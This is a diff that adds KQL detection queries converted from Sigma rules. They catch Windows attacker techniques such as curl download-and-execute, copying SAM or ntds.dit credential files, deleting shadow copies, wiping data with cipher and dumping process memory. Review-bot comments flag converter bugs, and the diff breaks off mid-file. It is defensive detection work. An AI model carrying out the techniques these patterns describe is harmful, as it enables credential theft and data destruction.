+| where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC" or InitiatingProcessCommandLine contains "-k wusvcs -p -s WaaSMedicSvc"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine
contains "C:\\Program Files\\Dropbox\\Client\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql b/KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql
new file mode 100644
index 00000000..5a6c2531
--- /dev/null
+++ b/KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql
@@ -0,0 +1,13 @@
+// Title: Console CodePage Lookup Via CHCP
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-02-21
+// Level: medium
+// Description: Detects use of chcp to look up the system locale value as part of host discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1614.001
+// False Positives:
+// - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.
+// - Discord was seen using chcp to look up code pages
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " –c " or InitiatingProcessCommandLine contains " —c " or InitiatingProcessCommandLine contains " ―c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " –r " or InitiatingProcessCommandLine contains " —r " or InitiatingProcessCommandLine contains " ―r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k " or InitiatingProcessCommandLine contains " –k " or InitiatingProcessCommandLine contains " —k " or InitiatingProcessCommandLine contains " ―k ") and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
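Review bot: In the chcp rule the first predicate lists `ProcessCommandLine endswith "chcp "` twice, so as written the third alternative is redundant. The upstream Sigma rule presumably distinguishes the variants by trailing whitespace (one versus two spaces), which may have been collapsed by the converter or by this rendering; confirm against the source and either restore the intended string or drop the duplicate so the generated query does not mislead the next reader. The `endswith "chcp"` alternative already covers the bare form, so the remaining two exist only to tolerate trailing spaces, which is worth a short comment in the generated header.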
diff --git a/KQL/rules/windows/process_creation/control_panel_items.kql b/KQL/rules/windows/process_creation/control_panel_items.kql
new file mode 100644
index 00000000..74887005
--- /dev/null
+++ b/KQL/rules/windows/process_creation/control_panel_items.kql
@@ -0,0 +1,10 @@
+// Title: Control Panel Items
+// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
+// Date: 2020-06-22
+// Level: high
+// Description: Detects the malicious use of a control panel item
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.t1218.002, attack.persistence, attack.t1546
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql b/KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql
new file mode 100644
index 00000000..48e23c77
--- /dev/null
+++ b/KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql
@@ -0,0 +1,12 @@
+// Title: ConvertTo-SecureString Cmdlet Usage Via CommandLine
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate use to pass password to different powershell commands
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql b/KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
new file mode 100644
index 00000000..c6def7c1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains " \\\\")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql b/KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql
new file mode 100644
index 00000000..10174710
--- /dev/null
+++ b/KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql
@@ -0,0 +1,12 @@
+// Title: Copy From Or To Admin Share Or Sysvol Folder
+// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
+// Date: 2019-12-30
+// Level: medium
+// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains " move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell_ise.exe" or FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
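Review bot: The target predicate `ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$"` repeats an identical single-backslash test, so the clause reduces to "any command line holding one backslash and a `$`", which matches ordinary paths with environment variables just as readily as an admin share and will make this rule very noisy. The duplication suggests the converter split the Sigma UNC prefix (two backslashes) into two separate one-backslash terms; the `copy_dmp_dump_files_from_remote_share_via_cmd_exe` rule earlier in this batch appears to render the same prefix as `contains " \\\\"`. Confirm against the Sigma source and emit a single `ProcessCommandLine contains "\\\\"` term, and add a converter unit test for escaped backslashes inside `contains|all` lists so the regression is caught before the next scheduled run.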
diff --git a/KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql b/KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql
new file mode 100644
index 00000000..c3fb7683
--- /dev/null
+++ b/KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Copy From VolumeShadowCopy Via Cmd.EXE
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+// - Backup scenarios using the commandline
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql b/KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql
new file mode 100644
index 00000000..f537d536
--- /dev/null
+++ b/KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql
@@ -0,0 +1,12 @@
+// Title: Copying Sensitive Files with Credential Data
+// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Files with well-known filenames (sensitive files with credential data) copying
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404
+// False Positives:
+// - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " -m " or ProcessCommandLine contains " /m " or ProcessCommandLine contains " –m " or ProcessCommandLine contains " —m " or ProcessCommandLine contains " ―m " or ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\security" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\windows\\ntds\\ntds.dit")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/createdump_process_dump.kql b/KQL/rules/windows/process_creation/createdump_process_dump.kql
new file mode 100644
index 00000000..bd04aae3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/createdump_process_dump.kql
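Review bot: The esentutl selector's `ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe"` compares the PE OriginalFileName against a value with a leading backslash; that field carries a bare file name, so this equality never holds and the branch silently depends on the `FolderPath endswith` test alone, defeating the purpose of the OriginalFileName check (catching a renamed binary). Drop the separator, `ProcessVersionInfoOriginalFileName =~ "esentutl.exe"`, which is how every other rule in this batch writes its OriginalFileName comparison. The defect may originate in the Sigma source rather than the converter, so it is worth having helper.py warn when an `OriginalFileName` value begins with a path separator.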
@@ -0,0 +1,12 @@
+// Title: CreateDump Process Dump
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Command lines that use the same flags
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql b/KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql
new file mode 100644
index 00000000..ad7a5ef6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql
@@ -0,0 +1,10 @@
+// Title: Csc.EXE Execution Form Potentially Suspicious Parent
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2019-02-11
+// Level: high
+// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense-evasion, attack.t1218.005, attack.t1027.004
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and
InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql
new file mode 100644
index 00000000..69b37b3c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Cscript/Wscript Potentially Suspicious Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
+// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith "\\rundll32.exe" or ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and ((ProcessCommandLine contains "mshta" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec")))) and (not(((ProcessCommandLine contains "UpdatePerUserSystemParameters" or ProcessCommandLine contains "PrintUIEntry" or ProcessCommandLine contains "ClearMyTracksByProcess") and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql b/KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql
new file mode 100644
index 00000000..c0eb9fa8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql
@@ -0,0 +1,10 @@ +// Title: Cscript/Wscript Uncommon Script Extension Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql b/KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql new file mode 100644 index 00000000..ead43930 --- /dev/null +++ b/KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql 
@@ -0,0 +1,10 @@ +// Title: Curl Download And Execute Combination +// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-01-13 +// Level: high +// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql new file mode 100644 index 00000000..af558ad1 --- /dev/null +++ b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql @@ -0,0 +1,10 @@ +// Title: Curl Web Request With Potential Custom User-Agent +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-27 +// Level: medium +// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine matches regex "\\s-H\\s" or ProcessCommandLine contains "--header") and ProcessCommandLine contains "User-Agent:" \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql b/KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql new file mode 100644 index 00000000..8cb84e79 --- /dev/null +++ b/KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql @@ -0,0 +1,10 @@ +// Title: Data Copied To Clipboard Via Clip.EXE +// Author: frack113 +// Date: 2021-07-27 +// Level: low +// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1115 + +DeviceProcessEvents +| where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql new file mode 100644 index 00000000..91944e9b --- /dev/null +++ b/KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql 
@@ -0,0 +1,13 @@ +// Title: Data Export From MSSQL Table Via BCP.EXE +// Author: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-08-20 +// Level: medium +// Description: Detects the execution of the BCP utility in order to export data from the database. +// Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.exfiltration, attack.t1048 +// False Positives: +// - Legitimate data export operations. + +DeviceProcessEvents +| where (ProcessCommandLine contains " out " or ProcessCommandLine contains " queryout ") and (FolderPath endswith "\\bcp.exe" or ProcessVersionInfoOriginalFileName =~ "BCP.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql b/KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql new file mode 100644 index 00000000..3b763009 --- /dev/null +++ b/KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql @@ -0,0 +1,12 @@ +// Title: Delete All Scheduled Tasks +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/delete_important_scheduled_task.kql b/KQL/rules/windows/process_creation/delete_important_scheduled_task.kql new file mode 100644 index 00000000..81a41fb2 --- /dev/null 
+++ b/KQL/rules/windows/process_creation/delete_important_scheduled_task.kql @@ -0,0 +1,12 @@ +// Title: Delete Important Scheduled Task +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql new file mode 100644 index 00000000..7b5a1979 --- /dev/null +++ b/KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Deleted Data Overwritten Via Cipher.EXE +// Author: frack113 +// Date: 2021-12-26 +// Level: medium +// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. +// Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. +// Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 + +DeviceProcessEvents +| where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql b/KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql new file mode 100644 index 00000000..aa94672f --- /dev/null +++ b/KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql 
@@ -0,0 +1,10 @@ +// Title: Deletion of Volume Shadow Copies via WMI with PowerShell +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-20 +// Level: high +// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql new file mode 100644 index 00000000..22afb0d3 --- /dev/null +++ b/KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE +// Author: Jonhnathan Ribeiro, oscd.community +// Date: 2020-10-16 +// Level: high +// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003 + +DeviceProcessEvents +| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/detected_windows_software_discovery.kql b/KQL/rules/windows/process_creation/detected_windows_software_discovery.kql new file mode 100644 index 00000000..7ddb7276 --- /dev/null +++ b/KQL/rules/windows/process_creation/detected_windows_software_discovery.kql @@ -0,0 +1,12 @@ +// Title: Detected Windows Software Discovery +// Author: Nikita Nazarov, oscd.community +// Date: 